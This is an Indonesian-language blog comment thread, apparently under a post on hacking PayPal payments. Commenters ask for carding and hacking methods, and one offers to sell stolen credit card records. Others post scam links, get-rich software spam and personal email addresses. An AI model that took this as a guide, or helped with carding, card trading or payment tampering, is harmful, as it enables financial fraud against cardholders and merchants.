Ditunggu cara lengkapnya Mas Bro

juliant.kyae@gmail.com

Thanks Before
RE

Ilegal Ebook said...

Belajar Langkah Demi Langkah... Bagaimana Anda BISA Menghasilkan Uang Melalui Internet dengan jalan pintas tanpa harus mengeluarkan uang banyak.

Kunjungi : http://bit.ly/ilegalebook

popopupu said...

ga usa ngajarin yang ga bener d...malu dikit sebagai umat beragama dan berakhlak...generasi penghancur bangsa ne namanya...

G said...

G_tobe@rocetmail.com

cara2nya dunk bang jaka ganteng. hhe

Anonymous said...

gw punya softwarenya n gw uda sering bgt nyoba...jadi kalo lu lu pada hobi download game, buy online. silahkan beli ke gua aja. dijamin 1000000% berhasil.
persyaratan mudah:
lu harus punya account paypal n punya duit (alias ga boleh 0) itu doank.

tapi resiko tanggung sendiri.
misterams84@yahoo.com.

bagoeshockery said...

mas tolong kasih saya pengetahuan yang lebih... dantunjukkan gmn cara'y jadi hacker handal... ini email saya an tolong inbox saya.. dan saya akan memebrikan imbalan baik kepda mas jaka...

EMAL : bagoeshockery@yahoo.com

saya tunggu ya mas... thanks

Anonymous said...

jarwo


om jaka..bagi elmu nya dong, bila berkenan...email saya
ronorenggo@yahoo.com

jail said...

mas jaka ane baru bljr!! ne mau tanya, ane dapt account amazon bule cara bejnjanya gimana ne,, dngr2 katnya ga bisa ya brngny dikirim ke indo.. trus klw liat nomer krtu kredtnya gimana??? bwt dpkai tk yng lain?? tlng pencerahannya! ntr bgi2 deh!!

Anonymous said...

share ilmunya dong baaaaang , , ,
inbox in ane ya , , ,

unit.babu@gmx.us
thx yo bro , , ,

donny-fernando said...

bang jaka saya butuh orang seperti anda tolong ilmunya di inbox saya donifernando12@yahoo.com saya ngefens dengan bang jaka ditunggu !

Anonymous said...

kayak nya yang punya blog ini masih kurang tau...sofware mulu...kreatif dunk pakai script...jangan sofware aja...punya orang lagi

Anonymous said...

mending cari disini gan!!
dolar gratis tis tis tis

http://www.AWSurveys.com?R=149020

Anonymous said...

temen yang sudah pro tolong kasi tau caranya ya!!!ne email saya mandrack.barker@yahoo.com

ardabil said...

websitnya tu apa ya gan????

Anonymous said...

buset rame banget ni forum,, mas jaka master PP ya,, ayo kita kerja sama mas,, add YM: wizard_adv,,, kita WD duit bule yuk,, hihiihii,, o ya,, untuk yang laen yg bth PP verif indo, VCC,,, bth akun2 premium,, bs add jg,, :)

sutha said...

Info bagus gan sekarang ane beli barang yg ane mau....hehehheh..
Mampir ke website ane gan bit.ly/MtVsyD..
Ditunggu ya..

PayPal Money Hack 2013 said...

nice posting bro :)
PayPal Money Hack 2013

Anonymous said...

ada yang lebih canggih nih teman2 n langsung bekerja. saya langsung dapat dari hacker dunia, kunjungi aja situsnya

http://www.hackpaypalfree.blogspot.com/

Anonymous said...

gan bisa tolong ajari untuk nge hack box motor dengan cara aman dan cepat??

please bantuannya...

surya aditya ajha said...

wah wah wah ini mah semua penipuan mending kunjungi http://multihackerteam.blogspot.com/
web milik team hacker indonesia yang benar2 pedulu dengan para netter korban2 penipuan sudah terbukti dan teruji,segera deh kunjungi webnya....saya dan teman2 group korban penipuan sudah banyak yang membuktikannya.

hienzo said...

ragu" mau nyoba !!
mending pake cara bersih aja deh :D

bloggertheftchecker said...

blog dengan admin bodoh yang skrg gak jelas keberadaannya, krn cuma pake blog gratisan. waspada penipuan jgn sampe kena imbas.

putracyber said...

berburu account gan.... www.efargo.com adakah yg py tmpt berburu account laen... ??? ksh tau ya gan...

CaraMenjadiAgenPulsa said...

Wah rame juga ya kalo topiknya hac meng hac..

Glutera Glutathione Cantik Tanpa Make Up said...

Belajar jualan via online!!!


Bisnis Sampngan said...

gan tolong ajarin , ane hack atm,,

mari kita sharing gan..

tolong dikirim ke emailku
hermantoaji454@yahoo.com


di tunggu

DoeDoenk DOank said...

bang jaka,aku mau bkin paypal,tapi kagak punya kartu kredit,kalo mau bkin vcc mahal nyampe 75 rbu,,,,klo kita pake kartu kredit orang lain bisa gak mas,kbetulan pas saya lagi di mirc bagian carding,saya dikasi ma senior2 byk bgt....semua identitasnya lengkap.Bantu saya ya bang jaka,kalo berkenan kirim ke email saya ya bang disini(cwo_thegame@yahoo.com)
thx ya bang jaka,please ya mas bantuin..

jolly angel said...

masih rendah ilmu hack lo

Adhitya Chandra said...

trik lama, dan saya berani jamin ini berhasil..tapi, ada tapinya. karena uang yg anda bayarkan ke rekening paypal penjual tidak sesuai dengan harga barang, pasti barang Anda jg tidak akan sampai/ terbeli. Alias, hanya setor 00.01$ ke akun penjual.

ini hanya untuk hacking nota pembelian saja, merubah nominal yg kita bayarkan..kalau mau dan niat beli ya pakai cara halal aja bro..kalau kagak punya duit kerja.

Ibnu MK said...

saya kagak bisa gan????
tolong caranya kirim ke email:
lionelkhuldun@ymail.com

Anonymous said...

gan punya keybca emulator yg siip ga? kalo ane berhasil tak bagi gan.
kalo ada kirim ke email ane zayinarif@gmail.com. tks

Anonymous said...

gimana cara verifikasi paypal , tapi ake nggk punya credit card gan . tolong ya

Anonymous said...

makasih infonya... saya mau belajar soal hack.. mohon kirim informasinya ke email saya: dimas.marzuki12@gmail.com... salam dan terimakasih

Anonymous said...

oommmm..jakka cara hack bli referal di PTC gimana ommm>>>ajarin dong mbaaah....kirim email ya mbah....gobaksodor@yahoo.com

tx..mbah

echa hr said...

Ms jaka kemaren aktivitasku direkam oleh FBI katanya sih....cos setiap aku buka firefox pasti ada tab ke dua isinya pesan bahwa kegiatan komputerku udah terdeteksi ma FBI akhirnya gue hancurin data dataku aku sih sempat gugup mas....yang aku tanyakan pakah masih terdeteksi ipku lo udah tak install ulang trims

cHARIZ said...

pusing-pousinggggg

ricky hamdani said...

mending pilih situs belanja yg harganya miring gan,bnyak diskon dan ada lelang harganya. lelang ini yg menarik,hrga $ 249,00 bisa menjadi $ 0,78
http://www.tripleclicks.com/13447319

Abimanyu Bala Dewa said...

ANDA INGIN TAHU BAGAIMANA SAYA MENDAPATKAN INCOME 4 JUTA RUPIAH SETIAP BULANYA HANYA DENGAN MENGINSTAL SOFTWARE DI COMPUTER ?????.
HANYA DENGAN INSTAL SOFWARE BISA DAPAT UANG JUTAAN RUPIAH SETIAP HARI. ANDA AKAN KAYA DALAM SEKEJAP HANYA DENGAN MENGINSTAL SOFTWARE PENAMBAH SALDO REKENING OTOMATIS INI.keuntungan bersih mulai Rp.350.000 sampai Rp.1.000.000 (satu juta Rupiah ) setiap harinya SECARA OTOMATIS bahkan bisa jauh melebihi nominal itu fantastis bukan ?,JANGAN SAMPAI ANDA LEWATKAN KESEMPATAN UNTUK MERUBAH KEUANGAN ANDA MENUJU TARAF JUTAWAN saya sudah membuktikanya dan saatnya anda buktikan sendiri keampuhan dan DAHSYATNYA SOFTWARE ini. Untuk DOWLOAD dan info lebih lanjut hubungi saya 085712584441 atau
buka & klik disini

Abimanyu Bala Dewa said...

ANDA INGIN TAHU BAGAIMANA SAYA MENDAPATKAN INCOME 4 JUTA RUPIAH SETIAP BULANYA HANYA DENGAN MENGINSTAL SOFTWARE DI COMPUTER ?????.
HANYA DENGAN INSTAL SOFWARE BISA DAPAT UANG JUTAAN RUPIAH SETIAP HARI. ANDA AKAN KAYA DALAM SEKEJAP HANYA DENGAN MENGINSTAL SOFTWARE PENAMBAH SALDO REKENING OTOMATIS INI.keuntungan bersih mulai Rp.350.000 sampai Rp.1.000.000 (satu juta Rupiah ) setiap harinya SECARA OTOMATIS bahkan bisa jauh melebihi nominal itu fantastis bukan ?,JANGAN SAMPAI ANDA LEWATKAN KESEMPATAN UNTUK MERUBAH KEUANGAN ANDA MENUJU TARAF JUTAWAN saya sudah membuktikanya dan saatnya anda buktikan sendiri keampuhan dan DAHSYATNYA SOFTWARE ini. Untuk DOWLOAD dan info lebih lanjut hubungi saya 085712584441 atau
buka & klik disini

Anonymous said...

Gan gmn aktifkan paypal

Robby Hdk said...

mas jakal tolong donk kasih cara yg ampuh buat paypalnya, masalahnya lg banyak tugas kuliah nich mas,..jadi perlu buku,..klu selalu beli terus, kagak cukup buat makan sehari2 mas,..makslum anak kost,.hehehehe,..ini email saya (robbyhdk@yahoo.com)

maz bron said...

GA ADA KONEKSI INTERNET GIMANA MAU ORDER :D
SOMPLAK :v

Anonymous said...

Yang tau tempat atau forum jual data cc di mana ya?
Aku punya ratusan data nomer cc, vcx, plus data owner
Dari kartu silver, gold, platinum
Yang tau kontak ya di prolive50@gmail.com
Buat yang ngasih tau forum jual belinya aku kasih 1 data free kartu platinum

ippank black said...

emang ude ada yg work?
bagi yg merasa dah berhasil ditrik ini,coba tunjukan dirimu

Anonymous said...

WAHHH MANTAP TRIKNYA. DAH BERHASIL NIH BELI BARANG DI EBAY. TRIMS YAAAA GANN ATAS INFONYA... MAKASIIIHHHHHHHHH
FOR BUKTI
http://prntscr.com/4he5cd

Ade Imam said...

Boleh ni anak kalimantan dikasi tau caranya... Soalnya di kalimantan brg2 pada mahal... Kalu di paypal kan bisa discont ... Discont ny smpe menjerit... Email ane : adeimamnugraha@gmail.com mohon bimbingan nya...

«Oldest ‹Older   1 – 200 of 226   Newer› Newest»